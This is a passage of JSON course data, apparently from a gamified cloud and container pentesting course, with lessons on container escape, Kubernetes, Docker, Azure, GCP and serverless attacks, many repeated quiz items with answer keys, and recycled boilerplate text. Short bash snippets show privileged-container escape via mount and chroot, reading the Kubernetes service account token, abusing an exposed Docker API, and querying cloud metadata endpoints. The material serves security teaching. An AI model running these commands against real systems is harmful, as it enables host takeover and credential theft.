volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"container-esc","cat":"Cloud & Container","title":"Container Escape","diff":3,"xp":250,"intro":"Break container isolation.","sections":[{"type":"text","content":"Break container isolation."},{"type":"code","lang":"bash","content":"# Privileged: mount /dev/sda1 /mnt; chroot /mnt\n# Docker socket: curl --unix-socket /var/run/docker.sock ..."},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Trivial escape flag?","opts":["--name","--privileged","--network","--volume"],"ans":1},{"type":"quiz","q":"Kubernetes secrets are stored as...","opts":["Encrypted by default","Base64 encoded (not encrypted)","Plain text","Hashed"],"ans":1},{"type":"quiz","q":"A container escape gives access to...","opts":["Another container","The host system","The internet","Nothing"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"k8s-atk","cat":"Cloud & Container","title":"Kubernetes Attacks","diff":3,"xp":250,"intro":"K8s misconfigurations.","sections":[{"type":"text","content":"K8s misconfigurations."},{"type":"code","lang":"bash","content":"curl https://node:10250/pods\ncat /var/run/secrets/kubernetes.io/serviceaccount/token"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"K8s token location?","opts":["/etc/k8s","/var/run/secrets/kubernetes.io/serviceaccount/","/root/.kube","/tmp"],"ans":1},{"type":"quiz","q":"The shared responsibility model means...","opts":["The cloud provider handles everything","Security is shared between provider and customer","The customer handles everything","No one is responsible"],"ans":1},{"type":"quiz","q":"Instance metadata is accessible at...","opts":["8.8.8.8","127.0.0.1","169.254.169.254","10.0.0.1"],"ans":2},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"docker-vuln","cat":"Cloud & Container","title":"Docker Vulnerabilities","diff":2,"xp":150,"intro":"Docker misconfigs.","sections":[{"type":"text","content":"Docker misconfigs."},{"type":"code","lang":"bash","content":"curl http://target:2375/version  # exposed API\ndocker run -v /:/mnt -it alpine chroot /mnt bash"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Docker group = root because?","opts":["Speed","Can mount host filesystem","Network","Logs"],"ans":1},{"type":"quiz","q":"Docker containers share the host's...","opts":["Nothing","Kernel","RAM only","Disk only"],"ans":1},{"type":"quiz","q":"Kubernetes secrets are stored as...","opts":["Encrypted by default","Base64 encoded (not encrypted)","Plain text","Hashed"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"azure-atk","cat":"Cloud & Container","title":"Azure Pentesting","diff":2,"xp":175,"intro":"Azure enumeration and exploitation.","sections":[{"type":"text","content":"Azure enumeration and exploitation."},{"type":"code","lang":"bash","content":"az login; az account list; az vm list\ncurl -H 'Metadata: true' 'http://169.254.169.254/metadata/instance?api-version=2021-02-01'"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Azure IMDS header?","opts":["Authorization","Metadata: true","X-Azure-Token","Accept"],"ans":1},{"type":"quiz","q":"A container escape gives access to...","opts":["Another container","The host system","The internet","Nothing"],"ans":1},{"type":"quiz","q":"The shared responsibility model means...","opts":["The cloud provider handles everything","Security is shared between provider and customer","The customer handles everything","No one is responsible"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"gcp-atk","cat":"Cloud & Container","title":"GCP Pentesting","diff":2,"xp":175,"intro":"Google Cloud exploitation.","sections":[{"type":"text","content":"Google Cloud exploitation."},{"type":"code","lang":"bash","content":"curl -H 'Metadata-Flavor: Google' http://169.254.169.254/computeMetadata/v1/"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"GCP metadata header?","opts":["Authorization","Metadata-Flavor: Google","X-GCP-Token","Accept"],"ans":1},{"type":"quiz","q":"Instance metadata is accessible at...","opts":["8.8.8.8","127.0.0.1","169.254.169.254","10.0.0.1"],"ans":2},{"type":"quiz","q":"Docker containers share the host's...","opts":["Nothing","Kernel","RAM only","Disk only"],"ans":1},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"serverless","cat":"Cloud & Container","title":"Serverless Attacks","diff":2,"xp":175,"intro":"Lambda/Functions exploitation.","sections":[{"type":"text","content":"Lambda/Functions exploitation."},{"type":"code","lang":"bash","content":"aws lambda get-function --function-name target\n# Reveals environment variables (secrets)"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Serverless secret storage?","opts":["Source code","Environment variables","Logs","Config files"],"ans":1},{"type":"quiz","q":"Kubernetes secrets are stored as...","opts":["Encrypted by default","Base64 encoded (not encrypted)","Plain text","Hashed"],"ans":1},{"type":"quiz","q":"A container escape gives access to...","opts":["Another container","The host system","The internet","Nothing"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cloud-tools","cat":"Cloud & Container","title":"Cloud Enum Tools","diff":2,"xp":125,"intro":"Automated cloud discovery.","sections":[{"type":"text","content":"Automated cloud discovery."},{"type":"code","lang":"bash","content":"scout aws\nprowler\npacu"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"AWS exploitation framework?","opts":["ScoutSuite","Pacu","Prowler","CloudSploit"],"ans":1},{"type":"quiz","q":"The shared responsibility model means...","opts":["The cloud provider handles everything","Security is shared between provider and customer","The customer handles everything","No one is responsible"],"ans":1},{"type":"quiz","q":"Instance metadata is accessible at...","opts":["8.8.8.8","127.0.0.1","169.254.169.254","10.0.0.1"],"ans":2},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"ecr-exploit","cat":"Cloud & Container","title":"Container Registry Exploit","diff":2,"xp":150,"intro":"Access private images.","sections":[{"type":"text","content":"Access private images."},{"type":"code","lang":"bash","content":"curl https://registry.target/v2/_catalog\ndocker pull registry.target/app:latest"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Registry catalog endpoint?","opts":["/v1/repos","/v2/_catalog","/images/list","/registry"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable 